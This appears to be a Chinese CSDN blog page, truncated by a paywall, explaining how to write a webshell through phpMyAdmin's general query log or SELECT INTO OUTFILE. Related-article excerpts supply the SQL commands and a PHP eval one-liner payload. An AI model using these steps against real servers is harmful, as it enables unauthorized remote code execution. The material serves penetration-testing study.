phpmyadmin登录后台后利用日志或file_into写入webshell

最新推荐文章于 2024-07-19 17:23:55 发布
最新推荐文章于 2024-07-19 17:23:55 发布
阅读量579 收藏
点赞数
文章标签: 安全
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/weixin_40602516/article/details/112653837
版权
本文介绍了如何在具有root权限并已知网站路径的情况下,通过PHPMyAdmin后台开启日志功能,将日志文件保存在网站目录下,然后使用SQL语句写入Webshell。同时讨论了`file_into`函数的应用,关注`secure_file_priv`配置,以调整读写文件的权限,并指导在不同操作系统中如何修改配置文件。
摘要由CSDN通过智能技术生成

必须为root权限并且已知网站路径:

在后台管理界面中,将general log改为ON ,general log file另存为网站目录下(webshell必须写入到网站目录下)

再利用sql语句写入用菜刀连接即可

 

利用file_into:

into写入文件时需要看secure_file_priv的值,当该值为null时。不允许读取任意文件,当该值为空时,

最低0.47元/天 解锁文章
不想当脚本小子的脚本小子
关注
利用phpMyAdminwebshell
05-01
利用phpMyAdminwebshell 利用phpMyAdminwebshell
phpmyadmin通过日志shell
m0_53087192的博客
01-07 930
1.查看general log是否开启 show variables like ‘%general%’; 打开general_log日志功能 SET GLOBAL general_log=‘on’; SHOW VARIABLES LIKE ‘%general%’; 查看绝对路径(探针等) shell,会把执行的语句shell.php,然后我们查询一下 SET GLOBAL general_log_file=‘C://phpStudy//PHPTutorial//WWW//shel
phpadminshell的四种方式
最新发布
weixin_46365325的博客
07-19 983
场景:当你拿下phpmyadmin后台之后,如何进行下一步操作。
phpmyadmin写入webshell
Kris__zhang的博客
03-15 1597
获取MySQL密码的方法 1、源代码泄露 2、暴力破解mysql 3、爆破出的phpmyadmin未授权访问漏洞 4、通过文件包含漏洞读取配置文件中的数据库账号密码 5、其他方式获取 暴力破解工具下载地址:https://wws.lanzous.com/i3iOTmyfhxg 密码:3uk5 我们成功的获取到mysql的账号密码,登录phpmyadmin管理界面之后,可通过以下方式写入webshell。 select … . into outfile 语句直接写入webshell 必需满足的条件 root
phpMyadmin通过日志webshell
p_utao的博客
11-23 877
查看general log是否开启 show variables like '%general%'; 打开general_log日志功能 SET GLOBAL general_log='on'; SHOW VARIABLES LIKE '%general%'; 通过探针查看绝对路径 shell SET GLOBAL general_log_file='C://phpStudy//PHPTutorial//WWW//shell.php'; 会把执行的语句shell.php,然后我们
phpmyadmin getshell 写入webshell
ShenZ的博客
07-19 220
phpmyadmin getshell 1、into_outfileshell 条件:需要secure_file_priv为允许 #1238 - Variable ‘secure_file_priv’ is a read only variable show variables like '%secure%' 2.日志 日志备份获取shell show global variables like "%genera%"; //查询general_log配置 set global general_lo
sql注入和phpmyadmin日志写入webshell
weixin_54813510的博客
05-25 1829
写入webshell的前提条件:1、需要root权限。2、知道网站根目录的绝对路径。3、数据库my.ini配置文件需要secure_file_priv配置为空。
利用phpmyadmin日志写入一句话木马
m0_68019293的博客
03-15 2731
首先登陆phpMyadmin后,点击sql模块 先用这一句命令查看它是否存在 secure_file_priv 这项功能,要null不一定等于no哦,如果没有就可以利用一个webshell 现在写入一句话木马文件,用into outfile函数 加网站下绝对路径,记住哦要把\ 改为/,因为网站的/ 和根目录下的\是不一样的 现在已经成功的写入了一句话木马的文件,这时候就可以用菜刀,蚁剑等工具链接它的文件绝对路径得到它的webshell,这是第一种方式 2 接下来这种呢就是利用日志..
phpmyadmin上传Webshell总结.docx
08-31
4. **通过数据库日志写入Webshell** 利用MySQL的日志功能,比如查询日志或慢查询日志,将Webshell写入这些日志文件,然后将日志文件转换为可执行的脚本。 (1)通过查询日志:确保查询日志开启,Webshell将记录...
phpmyadmin上传Webshell总结
afei001
08-31 523
目录 1.select查询输出webshell (1)创建表并INTO OUTFILE写入一句话 (2)select ... INTO OUTFILE写入一句话 2.通过构造命令执行拿shell (1)构造命令执行 (2)命令执行使用system()函数报错解决 3.secure_file_priv值不为空解决办法 4.通过数据库日志写入webshell (1)通过查询日志写入webshell (2)通过慢查询日志写入webshell 5.菜刀连接Windows和Linux系统区别
MySQL数据库写入webshell
weixin_45253622的博客
03-24 935
MySQL数据库写入webshell 判断 前提条件: 数据库当前用户为root权限 知道当前网站的绝对路径 PHP的GPC为OFF状态 写入的那个路径存在写入权限 注意点: secure_file_priv参数 这个参数用来限制数据导入和导出操作的效果,例如执行LOAD DATA、SELECT … INTO OUTFILE语句和LOAD_FILE()函数。 如果这个参数为空,这个变量没有效果。 如果这个参数设为一个目录名,MySQL服务只允许在这个目录中执行文件的导入和导出操作。这个目录必须存在,M
webshell php 教程,技术分享丨phpMyAdmin 常见写入webshell的方法(二)
weixin_39844963的博客
03-17 207
六.CVE-2018-19968 phpmyadmin文件包含getshell环境搭建:在线环境VulnSpy已为大家提供在线phpMyAdmin环境地址:https : //www.vsplate.com/?github = vulnspy/phpmyadmin-4.8.1,单击又上角的START TO HACK按钮可进行在线测试。也可以选择自行到phpmyadmin官网下载对应版本。利用条件...
通过phpMyAdminwebshell
andiao1218的博客
01-30 377
general_log默认为关闭的,root权限开启后,general_log_file会保存所有的查询语句 所以可以开启general_log,然后设置general_log_file为一个php文件,最后用一句话木马进行查询来获取webshell 进入phpMyAdmin后在SQL处执行SQL语句 首先查看general log是否开启 show variables li...
phpMyadminshell
wangyanjienice的博客
04-07 919
select into outfile 使用方法 select load_file('C:/phpStudy/MySQL/shell.php') select '<?php eval($_POST[cmd]); ?>' into outfile 'C:/phpStudy/MySQL/shell.php'; 1.查看绝对目录 select @@basedir; 2.查看写入权限 SHOW VARIABLES LIKE "secure_file_priv"; NULL表示禁止,无法写入
c++ 写入文件_phpMyAdmin利用日志文件GetSHELL
weixin_39798497的博客
11-27 87
phpMyAdmin简介phpMyAdmin 是众多MySQL图形化管理工具中使用最为广泛的一种,是一款使用PHP 开发的基于B/S模式的MySQL客户端软件,该工具是基于 Web 跨平台的管理程序,并且支持简体中文,用户可以在官网上下载最新版本的。GetSHELL前提1、phpMyAdmin利用日志文件GetSHELL前提账号必须有可读可权限2、MySQL版本大于5.0,MySQL 5.0版本...
web渗透【11】phpmyadminshell的三种方法
司徒荆的博客
05-30 6019
查看phpMyAdmin能否自定义导出文件目录的权限
PhpMyadmin--getshell
qq_64664156的博客
09-20 624
phpMyAdmin通过MySQL日志文件getshell
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值